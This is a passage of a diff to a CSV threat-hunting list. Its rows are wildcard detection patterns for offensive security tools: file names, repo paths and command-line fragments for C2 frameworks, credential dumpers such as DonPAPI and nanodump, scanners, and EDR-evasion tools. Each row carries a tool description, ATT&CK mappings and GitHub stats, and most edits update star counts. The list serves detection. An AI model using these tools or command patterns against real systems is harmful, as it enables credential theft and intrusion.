Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*MalSCCM.exe*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*MalSCCM-main*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" -"*malware.NewConfig*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*malwaredllc*","offensive_tool_keyword","byob","BYOB is an open-source post-exploitation framework for students. Pre-built C2 server Custom payload generator 12 post-exploitation modules It is designed to allow students and developers to easily implement their own code and add cool new features without having to write a C2 server or Remote Administration Tool from scratch","T1024 - T1059 - T1064 - T1002 - T1071","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/malwaredllc/byob","1","0","N/A","N/A","10","8504","2072","2023-10-02T14:55:32Z","2017-12-18T09:10:12Z" -"*man_in_the_browser.json*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*man_spider.manspider:main*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" +"*malware.NewConfig*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*malwaredllc*","offensive_tool_keyword","byob","BYOB is an open-source post-exploitation framework for students. Pre-built C2 server Custom payload generator 12 post-exploitation modules It is designed to allow students and developers to easily implement their own code and add cool new features without having to write a C2 server or Remote Administration Tool from scratch","T1024 - T1059 - T1064 - T1002 - T1071","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/malwaredllc/byob","1","0","N/A","N/A","10","8506","2072","2023-10-02T14:55:32Z","2017-12-18T09:10:12Z" +"*man_in_the_browser.json*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*man_spider.manspider:main*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" "*ManagedEasyHook.dll*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" -"*manageengine_adselfservice_plus_cve_2022_28810.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*manageengine_xnode/CVE*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*manager/keepass.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*manager/mRemoteNG.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*mandiant/DueDLLigence*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","441","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" -"*mandiant/gocrack*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*manageengine_adselfservice_plus_cve_2022_28810.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*manageengine_xnode/CVE*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*manager/keepass.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*manager/mRemoteNG.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*mandiant/DueDLLigence*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*mandiant/gocrack*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*mandiant/msi-search*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*mandllinject *","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","0","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" -"*manspider * -d * -u * -p *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*manspider */24 -f *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" +"*manspider * -d * -u * -p *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider */24 -f *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" "*manspider --threads * -d * -u * -H * --content admin*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*manspider*--loot-dir*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*manspider*--sharenames*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*manspider.py*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*manspider.spiderling*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*manspider_scan*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*MANSPIDER-master*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" +"*manspider*--loot-dir*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider*--sharenames*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider.py*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider.spiderling*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider_scan*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*MANSPIDER-master*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" "*map_payload_dll*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*map-get-tls-alternative-names *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*mapper_cve_exploit.py*","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","458","106","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" -"*masky_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*masscan -c *","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21683","2981","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" -"*masscan --nmap*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21683","2981","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" -"*masscan -p*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21683","2981","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" -"*masscan* -p*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21683","2981","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*masky_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*masscan -c *","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*masscan --nmap*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*masscan -p*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*masscan* -p*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" "*massdns -r *.txt*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*master/bootkit/src*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","448","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" -"*master/EncryptedZIP*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*master/HookDetector*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*master/ImplantSSP/*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*master/SwampThing*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" -"*master/UnquotedPath*","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*master/bootkit/src*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*master/EncryptedZIP*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*master/HookDetector*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*master/ImplantSSP/*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*master/SwampThing*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*master/UnquotedPath*","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*matterpreter*","offensive_tool_keyword","Github Username","github username hosting offensive tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/matterpreter","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*matterpreter/DefenderCheck*","offensive_tool_keyword","DefenderCheck","Identifies the bytes that Microsoft Defender flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" "*matterpreter/Shhmon*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense 